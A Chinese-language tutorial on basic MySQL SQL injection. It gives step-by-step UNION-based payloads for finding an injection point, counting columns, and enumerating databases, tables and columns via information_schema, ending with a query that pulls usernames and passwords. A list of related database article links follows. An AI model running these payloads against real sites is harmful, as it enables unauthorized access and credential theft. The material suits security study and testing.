web安全之简要sql注入

SQL注入原理:可控变量,带入数据库查询,变量中未存在过滤或者过滤不严谨

如何判断注入点?(以下数据库类型为mysql)

老办法:

and 1=1 页面正常

and 1=2 页面错误

可能存在注入点

但是要选用最舒服的方法去测试!

讲一下老方法的原理

select * from users where id=1 and 1=1,正常

select * from users where id=1 and 1=2,错误

前面都是正确的语句,区别在于后面。

如果是1=1,那么就是真且真,结果为真

如果是1=2,那么就是真且假,结果为假

就是说你所自定义的1=1或者1=2,被网站正常执行到了,所以就存在注入点

那么我们就可以自定义一些sql语句,获取数据库的数据,写sql语句可以用到联合查询UNION这个关键字

操作流程如下:

1.判断注入

2.猜测列名数量(字段数),一般用order by去猜

select * from users where id=1 order by (1~n),直到页面不正常即为字段数,比如4正常,5不正常,则字段数为4。

3.猜解准备

select * from users where id=-1 union select 1,2,3,4,正常

注意:id=-1,让前面的语句为错误语句,即可只执行后面的语句,这样的作用是看下哪几列数据可以显示出来,然后将能显示的替换成注入语句即可

4.信息收集

数据库版本:version()

数据库名称:database()

数据库用户:user()

操作系统:@@version_compile_o s

比如说正常显示2和3,那就可以写

select * from users where id=-1 union select 1,database(),version(),4

5.查询指定数据库名下的表名信息

如果是mysql5.0以上,则存在information_schema,其中存储所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或列名信息。

information_schema.tables:记录所有表名信息的表

information_schema.columns:记录所有列名信息的表

table_name:表名

column_name:列名

table_schema:数据库名

举例:select * from users where id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='这里写数据库名称'

group_concat()是把多行结果并作一行显示

6.查询指定表名下的列名信息

select * from users where id=-1 union select 1,column_name,3,4 from information_schema.columns where table_schema='这里写表名'

7.查询指定数据

select * from users where id=-1 union select 1,name,password,4 from 表名

相关推荐
betazhou12 分钟前
基于Linux环境实现Oracle goldengate远程抽取MySQL同步数据到MySQL
linux·数据库·mysql·oracle·ogg
lyrhhhhhhhh35 分钟前
Spring 框架 JDBC 模板技术详解
java·数据库·spring
喝醉的小喵2 小时前
【mysql】并发 Insert 的死锁问题 第二弹
数据库·后端·mysql·死锁
付出不多2 小时前
Linux——mysql主从复制与读写分离
数据库·mysql
初次见面我叫泰隆2 小时前
MySQL——1、数据库基础
数据库·adb
Chasing__Dreams3 小时前
Redis--基础知识点--26--过期删除策略 与 淘汰策略
数据库·redis·缓存
源码云商3 小时前
【带文档】网上点餐系统 springboot + vue 全栈项目实战(源码+数据库+万字说明文档)
数据库·vue.js·spring boot
源远流长jerry3 小时前
MySQL的缓存策略
数据库·mysql·缓存
纯纯沙口3 小时前
Qt—用SQLite实现简单的注册登录界面
数据库·sqlite
初次见面我叫泰隆3 小时前
MySQL——3、数据类型
数据库·mysql